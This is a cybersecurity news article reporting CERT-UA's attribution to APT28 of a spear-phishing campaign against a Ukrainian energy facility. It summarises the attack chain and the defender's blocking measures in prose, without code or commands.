Cyberwarfare / Nation-State Attacks , Fraud Management & Cybercrime

APT28 Spear-Phishes Ukrainian Critical Energy Facility

Energy Facility Impeded Attack by Blocking the Launch of the Windows Script Host
APT28 Spear-Phishes Ukrainian Critical Energy Facility
Ukrainian soldiers from the 72nd Mechanized Brigade in a photo dated Jan. 24, 2023 (Image: Ministry of Defense of Ukraine)

Ukrainian cyber defenders said Russian military hackers targeted a critical energy infrastructure facility with phishing emails containing a malicious script leading to cyberespionage.

See Also: OnDemand | 2024 Phishing Insights: What 11.9 Million User Behaviors Reveal About Your Risk

The Computer Emergency Response Team of Ukraine on Monday linked the campaign to APT28, the Russian GRU hacking group also known as Fancy Bear and Forest Blizzard, which was formerly Strontium.

The Russian state hacking group is behind a number of spear-phishing campaigns against Kyiv. U.S. and U.K. authorities earlier this year warned that the group had been exploiting a known vulnerability to deploy malware and access Cisco routers worldwide (see: Ukraine Facing Phishing Attacks, Information Operations).

CERT-UA released the report as Ukrainian forces have reportedly breached the southern first line of Russian defenses.

GRU hackers sent emails with a zip archive containing decoy jpeg files and a batch file named weblinks.cmd. Running the batch file opens decoy webpages and launches a VBS script that executes a .bat file.

The batch file uses the Microsoft Edge browser in headless mode to connect with a URL. A headless browser lacks a graphical user interface and is mainly used for testing or scraping. Attackers also download the Tor anonymity browser onto victim computers in a bid to siphon information through The Onion Router. APT28 also uses a PowerShell script to obtain the hash of the account password of the victim system and transmits it through the SMB protocol.

A cyber defender at the energy facility impeded the attack by blocking access to mockbin.org and mocky.io and stopping the launch of the Windows Script Host, CERT-UA says.


About the Author

Mihir Bagwe

Mihir Bagwe

Principal Correspondent, Global News Desk, ISMG

Bagwe previously worked at CISO magazine, reporting the latest cybersecurity news and trends and interviewing cybersecurity subject matter experts.




Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing bankinfosecurity.com, you agree to our use of cookies.